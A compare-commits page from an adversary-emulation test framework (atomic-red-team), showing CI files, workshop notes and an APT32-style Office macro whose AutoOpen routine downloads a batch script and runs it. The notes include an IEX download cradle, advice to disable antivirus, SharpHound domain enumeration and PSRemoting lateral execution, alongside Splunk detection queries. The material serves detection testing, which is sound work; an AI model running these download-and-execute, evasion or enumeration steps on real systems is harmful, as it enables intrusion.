security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Compare commits

merge into: security-tools/atomic-red-team:clr2of8-patch-14
Branches Tags
security-tools/atomic-red-team:master security-tools/atomic-red-team:dependabot/pip/typer-0.25.1 security-tools/atomic-red-team:dependabot/pip/hypothesis-6.152.4 security-tools/atomic-red-team:remove_ruby security-tools/atomic-red-team:attack-v19-migration security-tools/atomic-red-team:dependabot/pip/pydantic-2.13.3 security-tools/atomic-red-team:fix_attack_nav security-tools/atomic-red-team:markdown_changes security-tools/atomic-red-team:external_payloads security-tools/atomic-red-team:use-basic-parsing security-tools/atomic-red-team:pre-commit security-tools/atomic-red-team:python_conversion security-tools/atomic-red-team:issue_template_fix security-tools/atomic-red-team:insecure-curl security-tools/atomic-red-team:T1553.001_fix security-tools/atomic-red-team:npm_simulate security-tools/atomic-red-team:remove_bin security-tools/atomic-red-team:T1016_fix security-tools/atomic-red-team:cloudlfare-tunnel security-tools/atomic-red-team:remove_users_launch_daemon security-tools/atomic-red-team:sysmon_fix security-tools/atomic-red-team:fix_T1562.001 security-tools/atomic-red-team:cyberbuff-patch-2 security-tools/atomic-red-team:yamlfix security-tools/atomic-red-team:remove-unused-static-dir security-tools/atomic-red-team:clr2of8-patch-44 security-tools/atomic-red-team:clr2of8-patch-43 security-tools/atomic-red-team:clr2of8-patch-35 security-tools/atomic-red-team:clr2of8-patch-32 security-tools/atomic-red-team:t1547008 security-tools/atomic-red-team:atoms security-tools/atomic-red-team:clr2of8-patch-16 security-tools/atomic-red-team:clr2of8-patch-14 security-tools/atomic-red-team:testest security-tools/atomic-red-team:linpeas_linux security-tools/atomic-red-team:AutoSUID_linux security-tools/atomic-red-team:clr2of8-patch-8 security-tools/atomic-red-team:T1218.005-powershell-without-network-call security-tools/atomic-red-team:revert-1530-adding_comments_to_navigator security-tools/atomic-red-team:add_codeowners security-tools/atomic-red-team:clr2of8-patch-3 security-tools/atomic-red-team:oscd security-tools/atomic-red-team:admin-guide security-tools/atomic-red-team:APT28 security-tools/atomic-red-team:update-PSDocs security-tools/atomic-red-team:io-update security-tools/atomic-red-team:ProcessHolllowingT1093
..
pull from: security-tools/atomic-red-team:oscd
Branches Tags
security-tools/atomic-red-team:dependabot/pip/typer-0.25.1 security-tools/atomic-red-team:master security-tools/atomic-red-team:dependabot/pip/hypothesis-6.152.4 security-tools/atomic-red-team:remove_ruby security-tools/atomic-red-team:attack-v19-migration security-tools/atomic-red-team:dependabot/pip/pydantic-2.13.3 security-tools/atomic-red-team:fix_attack_nav security-tools/atomic-red-team:markdown_changes security-tools/atomic-red-team:external_payloads security-tools/atomic-red-team:use-basic-parsing security-tools/atomic-red-team:pre-commit security-tools/atomic-red-team:python_conversion security-tools/atomic-red-team:issue_template_fix security-tools/atomic-red-team:insecure-curl security-tools/atomic-red-team:T1553.001_fix security-tools/atomic-red-team:npm_simulate security-tools/atomic-red-team:remove_bin security-tools/atomic-red-team:T1016_fix security-tools/atomic-red-team:cloudlfare-tunnel security-tools/atomic-red-team:remove_users_launch_daemon security-tools/atomic-red-team:sysmon_fix security-tools/atomic-red-team:fix_T1562.001 security-tools/atomic-red-team:cyberbuff-patch-2 security-tools/atomic-red-team:yamlfix security-tools/atomic-red-team:remove-unused-static-dir security-tools/atomic-red-team:clr2of8-patch-44 security-tools/atomic-red-team:clr2of8-patch-43 security-tools/atomic-red-team:clr2of8-patch-35 security-tools/atomic-red-team:clr2of8-patch-32 security-tools/atomic-red-team:t1547008 security-tools/atomic-red-team:atoms security-tools/atomic-red-team:clr2of8-patch-16 security-tools/atomic-red-team:clr2of8-patch-14 security-tools/atomic-red-team:testest security-tools/atomic-red-team:linpeas_linux security-tools/atomic-red-team:AutoSUID_linux security-tools/atomic-red-team:clr2of8-patch-8 security-tools/atomic-red-team:T1218.005-powershell-without-network-call security-tools/atomic-red-team:revert-1530-adding_comments_to_navigator security-tools/atomic-red-team:add_codeowners security-tools/atomic-red-team:clr2of8-patch-3 security-tools/atomic-red-team:oscd security-tools/atomic-red-team:admin-guide security-tools/atomic-red-team:APT28 security-tools/atomic-red-team:update-PSDocs security-tools/atomic-red-team:io-update security-tools/atomic-red-team:ProcessHolllowingT1093

47 Commits
clr2of8-patch-14 .. oscd

Author SHA1 Message Date
CircleCI Atomic Red Team doc generator f427e2c338 Generate docs from job=validate_atomics_generate_docs branch=oscd 2020-11-23 13:41:01 +00:00
Matt Graeber 3610e65375 Merge pull request #1240 from remotephone/oscdt1016 
[OSCD] Test for T1016 - macOS firewall enumeration
 2020-11-23 08:40:31 -05:00
CircleCI Atomic Red Team doc generator 3a001ee8f9 Generate docs from job=validate_atomics_generate_docs branch=oscd 2020-11-23 13:40:04 +00:00
Matt Graeber 5f34ccd556 Merge pull request #1267 from oscd-initiative/oscd_sigma_sync 
[OSCD] split Linux and macOS tests for T1518.001; update processes list
 2020-11-23 08:39:33 -05:00
CircleCI Atomic Red Team doc generator 795ce8f499 Generate docs from job=validate_atomics_generate_docs branch=oscd 2020-11-12 18:22:28 +00:00
OG c4535c64dc [OSCD] Adding T1547.010 (#1264) 
* Port monitor addition

* Rename T1547.010.yml to T1547.010.yaml
 2020-11-12 11:22:04 -07:00
yugoslavskiy 60d73a2780 Update T1518.001.yaml 2020-10-30 06:56:20 +01:00
CircleCI Atomic Red Team doc generator cb5079f516 Generate docs from job=validate_atomics_generate_docs branch=oscd 2020-10-30 04:50:15 +00:00
Keith McCammon e0a61be952 Merge branch 'master' into oscd 2020-10-29 22:49:50 -06:00
CircleCI Atomic Red Team doc generator c570863162 Generate docs from job=validate_atomics_generate_docs branch=oscd 2020-10-30 04:44:05 +00:00
Keith McCammon 0b55c53c83 Grr 2020-10-29 22:43:10 -06:00
Keith McCammon 0a509412dd Remove index files to avoid CI complaints. 2020-10-29 22:23:49 -06:00
CircleCI Atomic Red Team doc generator b99407210d Generate docs from job=validate_atomics_generate_docs branch=oscd 2020-10-26 04:16:29 +00:00
Carl f0b2cad95a Merge pull request #1268 from aw350m33d/ISS_1219 
[OSCD] Added T1562.006 tests to emulate indicator blocking on Linux
 2020-10-25 22:15:56 -06:00
CircleCI Atomic Red Team doc generator 1114a1d32e Generate docs from job=validate_atomics_generate_docs branch=oscd 2020-10-26 04:13:24 +00:00
Carl d630fdfc2d Merge pull request #1263 from oscd-initiative/oscd_updates 
[OSCD] updated a few tests
 2020-10-25 22:12:59 -06:00
CircleCI Atomic Red Team doc generator eccacb66b4 Generate docs from job=validate_atomics_generate_docs branch=oscd 2020-10-26 04:12:11 +00:00
Carl 00f9e63a1c Merge pull request #1262 from oscd-initiative/oscd 
[OSCD] Update T1564.002: Hidden User Creation test for macOS
 2020-10-25 22:11:41 -06:00
CircleCI Atomic Red Team doc generator 83ebbf049d Generate docs from job=validate_atomics_generate_docs branch=oscd 2020-10-24 14:23:47 +00:00
omkargudhate22 e0495296ac [OSCD] Office persiststence : Office test (#1266) 
* Office persiststence :  Office test

* Added technique details
 2020-10-24 08:23:13 -06:00
CircleCI Atomic Red Team doc generator 8e3abf4620 Generate docs from job=validate_atomics_generate_docs branch=oscd 2020-10-21 16:52:26 +00:00
omkargudhate22 d3873c48a4 Indirect command execution - conhost (#1265) 2020-10-21 10:51:54 -06:00
aw350m3 347457a693 Removed prereq and fixed command endings 2020-10-20 08:48:23 +00:00
yugoslavskiy 618c150a94 Update T1518.001.yaml 2020-10-20 05:31:30 +02:00
Yugoslavskiy Daniil 2db46f3ca3 split linux and macos tests for TT1518.001; update processes list 2020-10-20 05:26:38 +02:00
aw350m3 5fb2ebf442 Added T1562.006 tests to emulate indicator blocking by modifying configuration files 2020-10-19 22:05:18 +00:00
Yugoslavskiy Daniil 30d8defed6 add Gatekeeper disable; add cleanup for security tools disable; add another launchagent for carbon black defense; remove Gatekeeper disable command from Gatekeeper bypass technique 2020-10-18 02:04:01 +02:00
Yugoslavskiy Daniil 23b1ad6331 update T1564.002 2020-10-18 01:23:05 +02:00
Yugoslavskiy Daniil d381056952 update T1564.002 2020-10-18 01:19:25 +02:00
CircleCI Atomic Red Team doc generator ce8e4dcf80 Generate docs from job=validate_atomics_generate_docs branch=oscd 2020-10-15 16:59:46 +00:00
sn0w0tter 761eb9cc72 [OSCD] Create atomic test for T1113 for Windows (#1251) 2020-10-15 10:59:14 -06:00
CircleCI Atomic Red Team doc generator 72e6640db6 Generate docs from job=validate_atomics_generate_docs branch=oscd 2020-10-15 16:51:45 +00:00
mrblacyk f9637403eb T1136.002 - 2 tests added (#1252) 2020-10-15 10:51:21 -06:00
CircleCI Atomic Red Team doc generator c51438c486 Generate docs from job=validate_atomics_generate_docs branch=oscd 2020-10-15 16:42:07 +00:00
mrblacyk dd48a41960 [OSCD] T1036.004: Masquerade Task or Service - 2 tests (#1253) 
* T1036.004 - 2 tests added

* Update T1036.004.yaml

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
 2020-10-15 10:41:21 -06:00
CircleCI Atomic Red Team doc generator d5ef015f53 Generate docs from job=validate_atomics_generate_docs branch=oscd 2020-10-15 16:36:33 +00:00
gregclermont 8e322ecb76 Add test for T1006 Direct Volume Access (#1254) 2020-10-15 10:36:07 -06:00
CircleCI Atomic Red Team doc generator c783bcc9db Generate docs from job=validate_atomics_generate_docs branch=oscd 2020-10-09 19:49:36 +00:00
Carl d5e35e5094 Merge pull request #1246 from haresudhan/T1497.001 
[OSCD] Tests added for T1497.001
 2020-10-09 13:49:11 -06:00
haresudhan 20e73bc883 Merge branch 'T1497.001' of github.com:haresudhan/atomic-red-team into T1497.001 2020-10-09 11:56:16 -06:00
haresudhan 8f5640a24e Changing to device manufacturer based test 2020-10-09 11:56:00 -06:00
remotephone@gmail.com fff4ea260b adding socketfilterfw and cleaning up description formatting, adding description details 2020-10-09 00:20:40 -05:00
CircleCI Atomic Red Team doc generator 06e9a0c56b Generate docs from job=validate_atomics_generate_docs branch=oscd 2020-10-08 17:52:19 +00:00
gregclermont efead2314d Add tests for T1134.001 Access Token Impersonation/Theft (#1236) 2020-10-08 11:51:28 -06:00
Carrie Roberts d17b6dd56e standardize display name 2020-10-08 10:47:41 -06:00
haresudhan 224bdc0d55 Tests added 2020-10-08 09:11:14 -06:00
remotephone@gmail.com 8281a56f15 Updating T1016 to include macos firewall enumeration 2020-10-06 23:39:21 -05:00
667 changed files with 269906 additions and 462047 deletions
Expand all files Collapse all files
.circleci/config.yml
+56
View File
@@ -0,0 +1,56 @@
version: 2
defaults: &defaults
docker:
- image: circleci/ruby:2.4
workflows:
version: 2
validate-then-generate-docs:
jobs:
- validate_atomics_generate_docs
jobs:
validate_atomics_generate_docs:
<<: *defaults
steps:
- checkout
- add_ssh_keys
- run:
name: Generate unique GUIDs for each atomic test
command: |
bin/generate-guids.rb
- run:
name: Validate the format of atomic tests against the spec
command: |
bin/validate-atomics.rb
- run:
name: Generate nice markdown document for atomics
command: |
bin/generate-atomic-docs.rb
echo ""
echo ""
git status
echo ""
echo ""
git diff-index HEAD --
if git diff-index --quiet HEAD -- ; then
echo "Not committing documentation because there are no changes"
#elif [[ "${CIRCLE_BRANCH}" == "master" ]]; then
# echo "Not committing documentation because we are on master and doc changes should be part of pull request branches"
elif [[ $(echo "$CIRCLE_BRANCH" | grep -c "pull") -gt 0 ]]; then
echo "Not committing documentation because we are on a pull request branch that we don't have push permissions to"
else
git config credential.helper 'cache --timeout=120'
git config user.email "<email>"
git config user.name "CircleCI Atomic Red Team doc generator"
git add atomics
git commit -am "Generate docs from job=$CIRCLE_JOB branch=$CIRCLE_BRANCH"
git push -u origin $CIRCLE_BRANCH
fi
.github/workflows/generate-docs.yml
-63
View File
@@ -1,63 +0,0 @@
name: generate-docs
on:
push:
branches:
- master
jobs:
generate-docs:
runs-on: ubuntu-latest
steps:
- name: checkout repo
uses: actions/checkout@v2
with:
token: ${{ secrets.PROTECTED_BRANCH_PUSH_TOKEN }}
ref: 'master'
- name: setup ruby
uses: ruby/setup-ruby@v1
with:
ruby-version: 2.7
bundler-cache: true
- name: Generate and commit unique GUIDs for each atomic test
run: |
bin/generate-guids.rb
echo ""
echo ""
git status
echo ""
echo ""
git diff-index HEAD --
if git diff-index --quiet HEAD -- ; then
echo "Not committing GUID changes because there are no changes"
else
git config credential.helper 'cache --timeout=120'
git config user.email "opensource@redcanary.com"
git config user.name "Atomic Red Team GUID generator"
git add atomics
git commit -am "Generate GUIDs from job=$GITHUB_JOB branch=$GITHUB_REF_NAME [skip ci]"
git push origin $GITHUB_REF_NAME -f
fi
- name: generate markdown docs for atomics
run: |
bin/generate-atomic-docs.rb
echo ""
echo ""
git status
echo ""
echo ""
git diff-index HEAD --
if git diff-index --quiet HEAD -- ; then
echo "Not committing documentation because there are no changes"
else
git config credential.helper 'cache --timeout=120'
git config user.email "opensource@redcanary.com"
git config user.name "Atomic Red Team doc generator"
git add atomics
git commit -am "Generated docs from job=$GITHUB_JOB branch=$GITHUB_REF_NAME [ci skip]"
git push origin $GITHUB_REF_NAME -f
fi
.github/workflows/validate-atomics.yml
-22
View File
@@ -1,22 +0,0 @@
name: validate-atomics
on:
push:
branches: [ master ]
pull_request:
branches: [ master ]
jobs:
validate-atomics:
runs-on: ubuntu-latest
steps:
- name: checkout repo
uses: actions/checkout@v2
- name: setup ruby
uses: ruby/setup-ruby@v1
with:
ruby-version: 2.7
bundler-cache: true
- name: validate the format of atomics tests against the spec
run: |
bin/validate-atomics.rb
.gitignore
-3
View File
@@ -24,6 +24,3 @@ docs/.sass-cache/
docs/_site/
**/Invoke-AtomicTest-ExecutionLog.csv
techniques_hash.db
# Credential files
*.creds
ARTifacts/Adversary/Dragons_Tail/DragonsTail.vba
+48
View File
@@ -0,0 +1,48 @@
' Save Document As Single Web Page .mht
' Rename Document As .Doc
' This Document is modeled after FireEye's report on APT32
' Special Thanks to Nick Carr for his work on this write-up
' https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html
Sub AutoOpen()
Dim myURL As String
Dim myPath As String
If (MsgBox("You're Are About To Execute the ATOMIC Test for Dragon's Tail, You sure?", 1, vbMsgBoxSetForeground) = 2) Then
End ' This Ends Macro
End If
' Downloads Dragon's Tail Chain Reaction Script
myURL = "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.bat"
Dim WinHttpReq As Object
Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
WinHttpReq.Open "GET", myURL, False, "username", "password"
WinHttpReq.send
myURL = WinHttpReq.responseBody
If WinHttpReq.Status = 200 Then
Set oStream = CreateObject("ADODB.Stream")
oStream.Open
oStream.Type = 1
oStream.Write WinHttpReq.responseBody
Dim fso As Object
Const FLDR_NAME As String = "C:\Tools\"
Set fso = CreateObject("Scripting.FileSystemObject")
If Not fso.FolderExists(FLDR_NAME) Then
fso.CreateFolder (FLDR_NAME)
End If
' Change Path HERE
oStream.SaveToFile "C:\Tools\NothingToSeeHere.bat", 2 ' 1 = no overwrite, 2 = overwrite
' EXECUTE FROM PATH
Shell "cmd.exe /c C:\Tools\NothingToSeeHere.bat"
oStream.Close
End If
End Sub
ARTifacts/Adversary/Dragons_Tail/README.md
+2
View File
@@ -0,0 +1,2 @@
### Group: Dragon's Tail
[Modeled After G0050](https://attack.mitre.org/wiki/Group/G0050)
ARTifacts/Atomic_Friday/2020-05-01/Atomic_Friday.md
Executable
+155
View File
@@ -0,0 +1,155 @@
# Atomic Friday - 05-01-2020
## Setup
My environment today is built with DetectionLab.
>This lab has been designed with defenders in mind. Its primary purpose is to allow the user to quickly build a Windows domain that comes pre-loaded with security tooling and some best practices when it comes to system logging configurations. It can easily be modified to fit most needs or expanded to include additional hosts.
Get it here:
https://github.com/clong/DetectionLab
Follow: [@DetectionLab](https://twitter.com/DetectionLab)
<img src="https://github.com/clong/DetectionLab/raw/master/img/DetectionLab.png" alt="DetectionLab" width="200"/>
We will be working from WIN10 system.
`$PSVersionTable`
```
Name Value
---- -----
PSVersion 5.1.18362.1
PSEdition Desktop
PSCompatibleVersions {1.0, 2.0, 3.0, 4.0...}
BuildVersion 10.0.18362.1
CLRVersion 4.0.30319.42000
...
```
## Get Invoke-AtomicRedTeam
<img src="https://www.redcanary.com/wp-content/uploads/image2-25.png" alt="Atomic" width="200"/>
https://github.com/redcanaryco/invoke-atomicredteam
```
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1')
Install-AtomicRedTeam -getAtomics
```
This will install `invoke-atomicredteam` and download `Atomics` folder from Atomic Red Team.
Note:
- `Set-ExecutionPolicy -Scope CurrentUser unrestricted`
- `set-executionpolicy unrestricted`
- Disable AV.
Atomics folder:
https://github.com/redcanaryco/atomic-red-team/tree/master/atomics
## Before Update
We're going to modify T1086 - BloodHound
https://github.com/redcanaryco/atomic-red-team/tree/23620c707ac1ed89e4207a39488f9214cf3c6e1e/atomics/T1086
## After Update
SharpHound PR
- https://github.com/redcanaryco/atomic-red-team/pull/955
- https://github.com/redcanaryco/atomic-red-team/pull/962
- Added src dir (removed payloads)
- Added input arguments
- Added prereqs
SharpHound ingestor:
https://github.com/BloodHoundAD/BloodHound/blob/master/Ingestors/SharpHound.ps1
## Local Execution
`Invoke-AtomicTest T1086 -ShowDetailsBrief`
```
PathToAtomicsFolder = C:\AtomicRedTeam\atomics
T1086-1 Mimikatz
T1086-2 Run BloodHound from local disk
T1086-3 Run Bloodhound from Memory using Download Cradle
```
Select test and show details:
`Invoke-AtomicTest T1086 -TestNumbers 2 -ShowDetails`
Check Prerequisits:
`Invoke-AtomicTest T1086 -TestNumbers 2 -CheckPrereqs`
```
CheckPrereq's for: T1086-2 Run BloodHound from local disk
Prerequisites not met: T1086-2 Run BloodHound from local disk
[*] SharpHound.ps1 must be located at C:\AtomicRedTeam\atomics\T1086\src
Try installing prereq's with the -GetPrereqs switch
```
Get Prerequisits:
`Invoke-AtomicTest T1086 -TestNumbers 2 -GetPrereqs`
```
GetPrereq's for: T1086-2 Run BloodHound from local disk
Attempting to satisfy prereq: SharpHound.ps1 must be located at C:\AtomicRedTeam\atomics\T1086\src
Prereq successfully met: SharpHound.ps1 must be located at C:\AtomicRedTeam\atomics\T1086\src
```
Execute:
`Invoke-AtomicTest T1086 -TestNumbers 2`
```
Import and Execution of SharpHound.ps1 from C:\AtomicRedTeam\atomics\T1086\src
-----------------------------------------------
Initializing SharpHound at 4:31 PM on 4/30/2020
-----------------------------------------------
Resolved Collection Methods: Group, Sessions, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container
[+] Creating Schema map for domain WINDOMAIN.LOCAL using path CN=Schema,CN=Configuration,DC=WINDOMAIN,DC=LOCAL
[+] Cache File not Found: 0 Objects in cache
[+] Pre-populating Domain Controller SIDS
Status: 0 objects finished (+0) -- Using 81 MB RAM
Status: 71 objects finished (+71 ∞)/s -- Using 86 MB RAM
Enumeration finished in 00:00:00.6317770
Compressing data to C:\Users\VAGRAN~1.WIN\AppData\Local\Temp\20200430163109_BloodHound.zip
You can upload this file directly to the UI
SharpHound Enumeration Completed at 4:31 PM on 4/30/2020! Happy Graphing!
Done executing test: T1086-2 Run BloodHound from local disk
```
Where are my reports!?
`-OutputDirectory $env:Temp`
`ls $env:Temp`
`20200430163109_BloodHound.zip`
Time to cleanup
`Invoke-AtomicTest T1086 -TestNumbers 2 -Cleanup`
```
Command (with inputs):
Remove-Item C:\AtomicRedTeam\atomics\T1086\src\SharpHound.ps1 -Force -ErrorAction Ignore
Remove-Item $env:Temp\*BloodHound.zip -Force
```
ARTifacts/Atomic_Friday/2020-05-01/BuildAtomicTest_ps1
+56
View File
@@ -0,0 +1,56 @@
Import-Module /Users/matt.graeber/Documents/GitHub/invoke-atomicredteam/Invoke-AtomicRedTeam.psd1
# Explore the functions exposed in invoke-atomicredteam
Get-Command -Module Invoke-AtomicRedTeam
# Path to the
$AtomicPath = '/Users/matt.graeber/Documents/GitHub/atomic-red-team/atomics/T1086/T1086.yaml'
# Get the raw YAML
$T1086 = Get-Content -Path $AtomicPath -Raw
# Parse the YAML, validate against expected atomic technique/test schema and output appropriate PowerShell object.
$AtomicTechnique = Get-AtomicTechnique -Path $AtomicPath
# Validate all atomics
Get-ChildItem -Path /Users/matt.graeber/Documents/GitHub/atomic-red-team/atomics/ -Recurse -Include 'T*.yaml' | Get-AtomicTechnique
# Recreate T1086 test #2
$InputArg1 = New-AtomicTestInputArgument -Name internal_domain -Description 'Specify internal domain name to analyze' -Type String -Default 'windomain.local'
$InputArg2 = New-AtomicTestInputArgument -Name file_path -Description 'File path for SharpHound payload' -Type String -Default 'PathToAtomicsFolder\T1086\src'
$DependencyArgs = @{
Description = 'Validate if SharpHound.ps1 is located in #{file_path}.'
PrereqCommand = 'if (Test-Path #{file_path}\SharpHound.ps1) {exit 0} else {exit 1}'
GetPrereqCommand = 'Invoke-WebRequest "https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1" -OutFile "#{file_path}\SharpHound.ps1"'
}
$Dependency = New-AtomicTestDependency @DependencyArgs
$TestArgs = @{
Name = 'Run BloodHound from local disk'
Description = @'
Upon execution SharpHound will be downloaded to disk, imported and executed. It will set up collection methods, run and then compress and store the data to the temp directory on the machine. If system is unable to contact a domain, proper execution will not occur.
Successful execution will produce stdout reporting LDAP connection was successful and BloodHound domain enumeration is occurring. Upon completion, final output will be a *BloodHound.zip file.
'@
SupportedPlatforms = 'Windows'
ExecutorType = 'PowerShell'
ExecutorCommand = @'
write-host "Import and Execution of SharpHound.ps1 from #{file_path}" -ForegroundColor Cyan
import-module #{file_path}\SharpHound.ps1; invoke-bloodhound -domain -OutputDirectory #{output_path}
'@
ExecutorCleanupCommand = @'
Remove-Item #{file_path}\SharpHound.ps1 -Force
Remove-Item #{file_path}\*BloodHound.zip -Force
'@
InputArguments = $InputArg1, $InputArg2
DependencyExecutorType = 'PowerShell'
Dependencies = $Dependency
}
$AtomicTest = New-AtomicTest @TestArgs
# Convert the atomic test to raw YAML. Add to existing technique. Profit
$AtomicTest | ConvertTo-Yaml
ARTifacts/Atomic_Friday/2020-05-01/Getting_Lateral.md
Executable
+59
View File
@@ -0,0 +1,59 @@
# Getting Lateral
Using DetectionLab, we will enable [PSRemoting](https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/enable-psremoting?view=powershell-7) on our remote host WEF and execute our Atomic Test on it.
## Setup
On WEF
```
Enable-PSRemoting
```
On Win10
Same terminal we used earlier:
`$sess = New-PSSession -ComputerName wef -Credential windomain.local\administrator`
Prompt for credentials
## Let's get Remote (execution)
Wiki - https://github.com/redcanaryco/invoke-atomicredteam/wiki/Execute-Atomic-Tests-(Remote)
After you have established the PS session ($sess) you can proceed with test execution as follows.
`Invoke-AtomicTest T1117 -TestNumbers 2 -ShowDetails`
`Invoke-AtomicTest T1003 -TestNumbers 4 -ShowDetails`
### Install any required prerequisites on the remote machine before test execution
`Invoke-AtomicTest T1117 -Session $sess -GetPrereqs`
### execute all atomic tests in technique T1117|T1003 on a remote machine
`Invoke-AtomicTest T1117 -Session $sess -TestNumbers 2`
`Invoke-AtomicTest T1003 -TestNumbers 4 -Session $sess`
## Validate execution
[T1117 Splunk](https://192.168.38.105:8000/en-US/app/search/search?q=search%20host%3Dwef*%20regsvr32.exe%20earliest%3D-30m%20latest%3Dnow&display.page.search.mode=smart&dispatch.sample_ratio=1&workload_pool=&earliest=-24h%40h&latest=now&sid=1588276958.707)
[T1003 Splunk](https://192.168.38.105:8000/en-US/app/search/search?q=search%20host%3Dwef*%20reg.exe%20earliest%3D-30m%20latest%3Dnow%20%7C%20stats%20values(Process_Command_Line)&display.page.search.mode=smart&dispatch.sample_ratio=1&workload_pool=&earliest=-24h%40h&latest=now&sid=1588277661.75&display.page.search.tab=statistics&display.general.type=statistics)
## Random Tips
- Add user to "Remote management Users" group.
- Enabling PowerShell remoting on client versions of Windows when the computer is on a public network is normally disallowed, but you can skip this restriction by using the SkipNetworkProfileCheck parameter. For more information, see the description of the SkipNetworkProfileCheck parameter.
- psremoting to a Windows Server will require an Administrator account (I used Administrator above, as example shown)
## Reference
- PSRemoting - https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/enable-psremoting?view=powershell-7
ARTifacts/Atomic_Friday/2020-06-05/Atomic_Friday.md
+112
View File
@@ -0,0 +1,112 @@
# Atomic Friday - 06-05-2020
Detection Engineering Philosophy in a nutshell
- https://twitter.com/mattifestation/status/1263416936517468167?s=20
Additional References:
- https://posts.specterops.io/detection-spectrum-198a0bfb9302
- https://posts.specterops.io/detection-in-depth-a2392b3a7e94
## Do it live
What data do I have?
```
| metadata type=sourcetypes index=botsv3 | eval firstTime=strftime(firstTime,"%Y-%m-%d %H:%M:%S") | eval lastTime=strftime(lastTime,"%Y-%m-%d %H:%M:%S") | eval recentTime=strftime(recentTime,"%Y-%m-%d %H:%M:%S") | sort - totalCount
```
Stats
Endpoint count
- `(index="botsv3" OR index="botsv2") | stats values(ComputerName)`
Event types
- `(index="botsv3" OR index="botsv2") | stats values(type)`
```
(index="botsv3" OR index="botsv2") powershell.exe source="WinEventLog:Microsoft-Windows-Sysmon/Operational" | stats values(CommandLine) by Computer
```
## Technique: Scheduled Tasks
- MITRE [T1053](https://attack.mitre.org/techniques/T1053/)
- Atomic Red Team [T1053](https://github.com/redcanaryco/atomic-red-team/blob/7d07686f600c0fb3bba468c987eb4e4faea83fa9/atomics/T1053/T1053.md)
Find all Schtasks:
`(index="botsv3" OR index="botsv2") schtasks.exe`
What data sources did we receive?
### Now let's see all the CommandLine?
`(index="botsv3" OR index="botsv2") schtasks.exe | stats values(CommandLine)`
`(index="botsv3" OR index="botsv2") schtasks.exe | stats values(CommandLine) by Computer`
`(index="botsv3" OR index="botsv2") schtasks.exe | stats values(CommandLine) by host`
### Change source (WinEventLog:Security)
`(index="botsv3") source="WinEventLog:Security" schtasks.exe | stats values(Process_Command_Line) by Creator_Process_Name`
`(index="botsv2") source="WinEventLog:Security" schtasks.exe | stats values(Process_Command_Line) by ComputerName`
### What created this?
`(index="botsv3" OR index="botsv2") source="WinEventLog:Microsoft-Windows-Sysmon/Operational" schtasks.exe | stats values(Image) by ParentImage`
`(index="botsv3" OR index="botsv2") source="WinEventLog:Microsoft-Windows-Sysmon/Operational" schtasks.exe ParentImage=*\\powershell.exe| stats values(Image) by ParentImage ParentCommandLine`
### Begin Tuning Schtasks Search
`(index="botsv3" OR index="botsv2") source="WinEventLog:Microsoft-Windows-Sysmon/Operational" schtasks.exe CommandLine=*powershell.exe*| stats values(CommandLine) by Computer`
`(index="botsv3" OR index="botsv2") source="WinEventLog:Microsoft-Windows-Sysmon/Operational" schtasks.exe CommandLine!="*\Office Automatic Updates*" CommandLine!="*\Office ClickToRun*" | stats values(CommandLine) by Computer`
but - because we know what we want to fire on -
We can target:
- `*frombase64string*`
- `http*`
- `powershell*`
I want to alert on each time someone creates a task:
`(index="botsv3" OR index="botsv2") source="WinEventLog:Microsoft-Windows-Sysmon/Operational" schtasks.exe CommandLine=*Create* ParentImage!=*\\OfficeClicktoRun.exe | stats values(CommandLine) by Computer`
There is a whole list of things we target. But, first gathering scheduled tasks in a report helps us identify a baseline.
### Saved Reports
`(index="botsv3" OR index="botsv2") source="WinEventLog:Microsoft-Windows-Sysmon/Operational" schtasks.exe CommandLine=*Create* ParentImage!=*\\OfficeClicktoRun.exe | stats values(CommandLine) by Computer`
### Prep for alert:
`(index="botsv3" OR index="botsv2") source="WinEventLog:Microsoft-Windows-Sysmon/Operational" schtasks.exe | table Computer, User, CommandLine, _time`
`(index="botsv3" OR index="botsv2") source="WinEventLog:Microsoft-Windows-Sysmon/Operational" schtasks.exe CommandLine=*Create* ParentImage!=*\\OfficeClicktoRun.exe | table Computer, User, CommandLine, _time`
## Technique: Powershell
Sometimes we may not see the whole picture looking at process command line (Sysmon). What if we had Powershell transactions logs?
`(index="botsv3" OR index="botsv2") powershell.exe source="WinEventLog:Microsoft-Windows-PowerShell/Operational"`
Sysmon -
`(index="botsv3" OR index="botsv2") powershell.exe source="WinEventLog:Microsoft-Windows-Sysmon/Operational" | stats values(CommandLine) by Computer`
### Alerts
Email alerts:
Save “Saved Search” with (or change) for a “clean” alert:
`| table Computer, User, CommandLine, _time`
Recommend throttling each alert by current estimated time to remediation.
Ex - Throttle 3 days
ARTifacts/Atomic_Friday/README.md
+1
View File
@@ -0,0 +1 @@
Notes, resources, and errata related to Atomic Friday events.
ARTifacts/Chain_Reactions/README.md
+1
View File
@@ -0,0 +1 @@
# Chain Reactions
ARTifacts/Chain_Reactions/atomic-hello
Executable
BIN
View File
Binary file not shown.
ARTifacts/Chain_Reactions/atomic-hello.c
+11
View File
@@ -0,0 +1,11 @@
#include <stdio.h>
// Simple Hello World for Atomic Red Team payload
int main() {
printf("Hello from Atomic Red Team! \n");
return 0;
}
ARTifacts/Chain_Reactions/atomic-hello.cs
+13
View File
@@ -0,0 +1,13 @@
using System;
// C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe atomic-hello.cs
// Expected Output: Hello from Atomic Red Team! \n Press Enter To Close.
public class Program
{
public static void Main()
{
Console.WriteLine("Hello from Atomic Red Team! \n Press Enter To Close.");
Console.ReadLine();
}
}
ARTifacts/Chain_Reactions/atomic-hello.exe
BIN
View File
Binary file not shown.
ARTifacts/Chain_Reactions/atomic-hello.macos
Executable
BIN
View File
Binary file not shown.
ARTifacts/Chain_Reactions/chain_reaction_Argonaut.ps1
+19
View File
@@ -0,0 +1,19 @@
# Chain Reaction: Argonaut
